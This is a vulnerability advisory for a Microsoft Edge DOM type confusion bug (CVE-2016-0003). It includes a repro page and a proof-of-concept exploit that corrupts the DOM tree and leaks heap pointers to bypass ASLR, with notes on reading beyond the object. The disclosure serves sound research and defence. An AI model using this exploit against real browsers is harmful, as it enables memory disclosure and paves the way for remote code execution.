
MS Edge CDOMTextNode::get_data type confusion

(MS16-002, CVE-2016-0003)

Specially crafted JavaScript inside an HTML page can trigger a type confusion bug in Microsoft Edge that allows accessing a C++ object as if it were a BSTR string. This can result in information disclosure, such as allowing an attacker to determine the value of pointers to other objects and/or functions. This information can be used to bypass ASLR mitigations. It may also be possible to modify arbitrary memory and achieve remote code execution, but this was not investigated.

Known affected software, attack vectors and mitigation

Repro.html

<html>
  <head>
    <script>
      document.addEventListener("DOMNodeRemoved", function(oEvent) {
        oTextNode = document.createTextNode("");
        document.body.insertBefore(oTextNode);
      }, true);
      onload = function(){
        document.body.appendChild(oExistingChild);
        for (var oNode = document.body.firstChild;
            oNode && oNode != oNode.nextSibling; // note #1 below
            oNode = oNode.nextSibling
        ) {
          // Doing this seems to be required to avoid triggering an assert.
          // The tree is corrupt in that oTextNode.nextSibling == oTextNode
          // hence the extra check at #1 to prevent an infinite loop.
        }
        alert(oTextNode.nodeValue);
      }
    </script>
  </head>
  <body id=oParent>x<x id=oExistingChild>x</x></body>
</html>

Description

Appending an element to the parent it already belongs to causes Edge to first remove the element from that parent, which fires a DOMNodeRemoved event, and then re-append the element as the last child of the same parent. During the DOMNodeRemoved event, a JavaScript event handler can modify the DOM tree, e.g. by appending a text node to the parent element. That operation completes during the event, so the text node is appended as a child before the element that fired the event is re-appended. Once the event handler returns, the element is appended. It appears that the code determines where this element should be inserted before firing the DOMNodeRemoved event handler, so the element ends up as a child of the parent before the text node, rather than after it.
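The suspected ordering problem can be illustrated with a toy model. This is only a sketch under stated assumptions: a plain array stands in for the parent's child list, and the function name `appendChildWithStaleIndex` and its steps are hypothetical, not Edge internals. It shows how an insertion point chosen before the event handler runs ends up placing the element before the newly added text node. It does not reproduce the actual tree corruption.

```javascript
// Toy model only: a plain array stands in for the parent's child list.
// None of these names correspond to real Edge internals.
function appendChildWithStaleIndex(children, child, onNodeRemoved) {
  // Step 1: detach the child from its current position.
  const oldIndex = children.indexOf(child);
  if (oldIndex !== -1) children.splice(oldIndex, 1);

  // Step 2 (the assumed flaw): decide where the child will go *before*
  // the DOMNodeRemoved handler has had a chance to run.
  const insertIndex = children.length;

  // Step 3: fire the handler, which is free to modify the child list.
  onNodeRemoved(children);

  // Step 4: insert at the index computed in step 2, which is now stale.
  children.splice(insertIndex, 0, child);
  return children;
}

const result = appendChildWithStaleIndex(
  ["x", "oExistingChild"],
  "oExistingChild",
  (children) => children.push("oTextNode") // handler appends a text node
);
console.log(result.join(", ")); // x, oExistingChild, oTextNode
```

In this model the element lands before the text node even though its append was requested first and should have placed it last.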

After all this is done, the DOM tree has become corrupted. This can be confirmed by checking that the .nextSibling property of the text node is the text node itself, i.e. there is a loop in the DOM tree.
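A more general form of that check walks the sibling chain and reports any node reached twice. The helper below is a minimal sketch: `findSiblingLoop` is a hypothetical name, and plain objects with a `nextSibling` property stand in for DOM nodes so that it can be run outside a browser.

```javascript
// Walks a sibling chain and returns the first node that is reached twice,
// or null if the chain terminates normally. Works on any objects exposing
// a `nextSibling` property (hypothetical helper, not part of the repro).
function findSiblingLoop(firstNode) {
  const seen = new Set();
  for (let node = firstNode; node; node = node.nextSibling) {
    if (seen.has(node)) return node; // chain loops back to this node
    seen.add(node);
  }
  return null;
}

// Plain-object stand-ins for the corrupted tree described above.
const textNode = { name: "oTextNode", nextSibling: null };
textNode.nextSibling = textNode; // the corruption: node is its own sibling
const existing = { name: "oExistingChild", nextSibling: textNode };
const first = { name: "x", nextSibling: existing };

console.log(findSiblingLoop(first) === textNode); // true
```

In a browser the same function could be called as `findSiblingLoop(document.body.firstChild)`.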

Another effect is that reading the .nodeValue of the text node will cause the code to confuse a C++ object that Trident/Edge uses to model the DOM tree with a BSTR object that represents the text data stored in the text node. This allows an attacker to read the data stored in this C++ object, which includes various pointers.

Exploit

A PoC exploit that reads and shows partial content of the DOM tree object was created; it has been tested on x64 systems to show heap pointers, allowing an attacker to undo heap ASLR.

The amount of data read can be controlled by the attacker and data beyond the memory allocated for the C++ object can be read. An attacker may be able to use Heap Feng-Shui to position another object with interesting information in the memory following the C++ DOM tree object and read data from this second object as well.
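The arithmetic behind the read range can be sketched as follows, using the figures given in the comments of Exploit.html: the copy starts at first_structure + 0xC and its length is a WCHAR count. The structure size of 0xB0 bytes is an assumption derived from the x64 field listing in those comments (last field: 8 bytes at offset 0xA8). The real heap allocation may be larger, and the names below are hypothetical.

```javascript
const BSTR_OFFSET = 0x0c;          // data is copied from first_structure + 0xC
const FIRST_STRUCTURE_SIZE = 0xb0; // assumed: last listed field is 8 bytes at 0xA8

// Returns the byte range (relative to the start of first_structure) that a
// read of `wcharCount` WCHARs covers, and how far it runs past the structure.
function describeRead(wcharCount) {
  const endOffset = BSTR_OFFSET + wcharCount * 2; // one WCHAR = 2 bytes
  return {
    startOffset: BSTR_OFFSET,
    endOffset: endOffset,
    bytesPastStructure: Math.max(0, endOffset - FIRST_STRUCTURE_SIZE),
  };
}

const safeRead = describeRead(0x21); // ends at 0x4e, inside the structure
const overRead = describeRead(0xa4); // ends at 0x154, past the structure
console.log(safeRead.endOffset.toString(16), safeRead.bytesPastStructure);
console.log(overRead.endOffset.toString(16), overRead.bytesPastStructure.toString(16));
```

Under these assumptions a length of 0x21 stays within the object, while 0xa4 reads 0xa4 bytes of whatever follows it on the heap.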

Finally, setting the nodeValue property is possible; doing so caused an access violation when I attempted it. I did not analyze the code path or the reason for the AV, but I suspect that it may be possible to modify the C++ DOM tree object and/or other memory using this bug. This would be even more interesting to an attacker, as it may allow remote code execution.

No attempt was made to create a PoC exploit that abuses this issue to undo ASLR and/or execute arbitrary code.

Exploit.html

<html>
  <head>
    <script>
      var uNodeRemovedEvents = 0;
      onerror = function (sError, sSource, uLine){
        alert(sError + " on line " + uLine);
      };
      document.addEventListener("DOMNodeRemoved", function(oEvent) {
        if (uNodeRemovedEvents++ == 0) {
          oTextNode = document.createTextNode("[2]");
          // Note that insertBefore with no second argument is functionally equivalent to appendChild and Edge's
          // implementation will simply call the appendChild implementation. I have used insertBefore here to make it
          // easier to identify if a heap block was allocated by this call, or the appendChild call you'll see later:
          // the stack recorded by page heap does not include "appendChild" here but it does for the latter.
          document.body.insertBefore(oTextNode);
        };
      }, true);
      onload = function(){
        // appendChild on an element that has a parent will remove it from the parent first, trigger a DOMNodeRemoved
        // event, then append it as the last child of the new parent and trigger a DOMNodeInserted event.
        document.body.appendChild(oExistingChild);
        // However, during the DOMNodeRemoved event for oExistingChild, the oTextNode node is inserted using
        // appendChild. This second appendChild call is completed first, so the oTextNode node is appended as the last
        // child of the body element first. The DOMNodeRemoved event completes and the oExistingChild node is then
        // appended as the second to last child of the body element. For reasons unknown, after this the nextSibling of
        // oTextNode is corrupted and points to itself, creating a sort of loop in the DOM tree.
        for (var oNode = document.body.firstChild; oNode && oNode != oNode.nextSibling; oNode = oNode.nextSibling) {
          // Doing this seems to be required to avoid triggering an assert - not sure why, but it might cache the
          // tree in a way that prevents Edge from detecting that the tree is corrupt.
        }
        if (oTextNode.nextSibling !== oTextNode) {
          // This should have happened, but if the bug was triggered, the tree is corrupt and oTextNode is its own
          // sibling.
          throw new Error("Tree is not corrupt");
        }
        alert("Set breakpoints if needed");
        // ^^ You can set a breakpoint during this popup to follow what happens, some suggested locations:
        // * EDGEHTML!CDOMTextNode::get_data
        // * EDGEHTML!CDOMTextNode::get_length
        // * EDGEHTML!Tree::TextNode::TextNodeFromDOMTextNode
        // * msvcrt!memcpy_s
        // After hitting the breakpoint, you may want to step over code until you return from the call to
        // TextNodeFromDOMTextNode. Its return value is a pointer to a structure like this:
        // struct first_structure {
        //   DWORD dwUnknown_00;     // flags, value depends on DOM tree at start of repro.
        //   DWORD dwUnknown_04;
        //   VOID* pUnknown_08;
        //   VOID* pUnknown_10;
        //   VOID* pUnknown_18;
        //   VOID* pUnknown_20;
        //   BYTE[0x10] bUnknown_28;
        //   VOID* pUnknown_38;      // points to self or another structure, depends on DOM tree at start of repro.
        //   VOID* pUnknown_40;
        //   VOID* pUnknown_48;
        //   VOID* pElement_50;      // points to a C*Element instance
        //   VOID* pUnknown_58;
        //   BYTE[0x18] bUnknown_60;
        //   VOID* pUnknown_78;
        //   VOID* pUnknown_80;
        //   BYTE[0x10] bUnknown_88;
        //   VOID* pUnknown_98;
        //   VOID* pUnknown_A0;
        //   BYTE[0x8] bUnknown_A8;
        // }
        // The second_structure and third_structure referenced in the table below look like this:
        // struct second_structure {
        //   DWORD dwUnknown_00;     // flags, value depends on DOM tree at start of repro.
        //   DWORD dwUnknown_04;
        //   VOID* pUnknown_08;
        //   VOID* pUnknown_10;
        //   VOID* pUnknown_18;
        //   VOID* pUnknown_20;
        //   BYTE[0x8] bUnknown_28;
        //   VOID* pUnknown_30;
        //   VOID* pUnknown_38;
        //   BYTE[0x10] bUnknown_40;
        // }
        // struct third_structure {
        //   DWORD dwUnknown_00;     // flags, value depends on DOM tree at start of repro.
        //   DWORD dwUnknown_04;
        //   VOID* pUnknown_08;
        //   VOID* pUnknown_10;
        //   VOID* pUnknown_18;
        //   VOID* pUnknown_20;
        //   VOID* pElement_28;      // points to a C*Element instance
        //   VOID* pUnknown_30;
        //   BYTE[0x18] bUnknown_38;
        //   VOID* pUnknown_50;
        //   VOID* pUnknown_58;
        //   BYTE[0x10] bUnknown_60;
        //   VOID* pUnknown_70;
        //   VOID* pUnknown_78;
        //   BYTE[0x8] bUnknown_80;
        // }
        // These structures are typical structures used by Trident to keep track of the DOM tree. However, the code
        // appears to confuse them with structures of a type that contain the text data in a TextNode. The code assumes
        // that the length of the (BSTR) text data is found at "first_structure->pUnknown_38->dwUnknown_00", and the
        // BSTR itself at "first_structure + 0xC". These two values can be influenced through the initial HTML, like so:
        //
        // copying bytes from first_structure+0xC
        //                                         | first_structure                    | *pUnknown_38 |
        // Initial HTML:                           | dwUnknown_00 | typeof *pUnknown_38 | dwUnknown_00 |
        //-----------------------------------------+--------------+---------------------+--------------+
        // x<x id=oExistingChild></x>              | 0x21         | (self)              | 0x21         |
        // x<x id=oExistingChild>x</x>             | 0x31         | second_structure    | 0xa4         |
        // x<x id=oExistingChild>x<a></a></x>      | 0x31         | third_structure     | 0x422        |
        // <a>x<x id=oExistingChild></x></a>       | 0x421        | (self)              | 0x421        |
        //
        // So, "x<x id=oExistingChild></x>" is a "safe" value to use, as it will copy 0x21 WCHARs from
        // first_structure+0xC into a new BSTR; effectively copying bytes 0x0C-0x4E, which is well within the range of
        // the structure. This allows an attacker to read parts of the first_structure data, including a number of
        // pointers to heap data.
        //
        // If one would like to read information not stored in the first_structure, some of the other HTML strings may
        // be used to copy more information than is contained in just the first_structure: e.g.
        // "x<x id=oExistingChild>x</x>" copies 0xa4 WCHARs, which means bytes 0x0C-0x154, which is well beyond the
        // extent of the first_structure data. With page heap enabled, you will see an access violation. Without page
        // heap and with a bit of heap feng-shui, an attacker may be able to position an object with other interesting
        // information in the memory following the first_structure, e.g. an object with a vftable pointer. This would
        // allow an attacker to read the vftable pointer and determine the location of DLLs in memory.
        //
        // To keep this repro simple and reliable, it only attempts to read data from within first_structure.
        var sData = ("A" + oTextNode.nodeValue).substr(1); // make a copy
        var sHexData = "Read 0x" + sData.length.toString(16);
        sHexData += " bytes: ????????`????????"; // first three DWORDs are unknown
        sHexQWord = "`????????"; // third DWORD is unknown
        for (var uBytes = 4, uOffset = 4, uIndex = 0; uIndex < sData.length; uIndex++) {
          var sHexWord = sData.charCodeAt(uIndex).toString(16);
          while (sHexWord.length < 4) sHexWord = "0" + sHexWord;
          sHexQWord = sHexWord + sHexQWord;
          uBytes += 2;
          if (uBytes == 4) sHexQWord = "`" + sHexQWord;
          if (uBytes == 8) {
            sHexData += " " + sHexQWord;
            sHexQWord = "";
            uBytes = 0;
          };
        };
        if (sHexQWord) {
          while (sHexQWord.length < 17) {
            if (sHexQWord.length == 8) sHexQWord += "`";
            sHexQWord = "????" + sHexQWord;
          }
          sHexData += " " + sHexQWord;
        }
        alert(sHexData);
        // This will crash because of the corrupt DOM tree, but it appears to indicate you may be able to modify
        // data as well as read it.
        oTextNode.nodeValue = "";
      };
    </script>
  </head>
  <body>x<x id=oExistingChild></x></body>
</html>
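Once the leaked string has been read, individual pointers can be picked out by structure offset rather than by scanning a hex dump. The helper below is a sketch, not part of the original exploit: `qwordAt` is a hypothetical name, and it assumes (as the exploit comments state) that the string starts at first_structure + 0xC and that values are stored little-endian. The sample data is synthetic.

```javascript
const LEAK_START_OFFSET = 0x0c; // leaked string starts at first_structure + 0xC

// Returns the QWORD at `structOffset` formatted as "hhhhhhhh`llllllll",
// or null if the leaked string does not cover all 8 bytes of it.
function qwordAt(leak, structOffset) {
  const firstChar = (structOffset - LEAK_START_OFFSET) / 2; // 2 bytes per WCHAR
  if (!Number.isInteger(firstChar) || firstChar < 0 || firstChar + 4 > leak.length) {
    return null;
  }
  let hex = "";
  for (let i = 3; i >= 0; i--) { // little-endian: last WCHAR is most significant
    hex += leak.charCodeAt(firstChar + i).toString(16).padStart(4, "0");
    if (i === 2) hex += "`"; // separator between high and low DWORD
  }
  return hex;
}

// Synthetic data: two filler WCHARs covering offsets 0x0C-0x0F, followed by
// the made-up QWORD 0x000001f2`3a5c8e40 at offset 0x10.
const fakeLeak = "\u4141\u4141" + "\u8e40\u3a5c\u01f2\u0000";
console.log(qwordAt(fakeLeak, 0x10)); // 000001f2`3a5c8e40
console.log(qwordAt(fakeLeak, 0x08)); // null (starts before the leaked data)
```

The QWORD at offset 0x08 is only half covered by the leak, which is why the original dump prints its low DWORD as question marks.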
© Copyright 2016 by Sky­Lined.
Creative Commons License This work is licensed under a Creative Commons Attribution-Non‑Commercial 4.0 International License.

Last updated on 2016-11-21.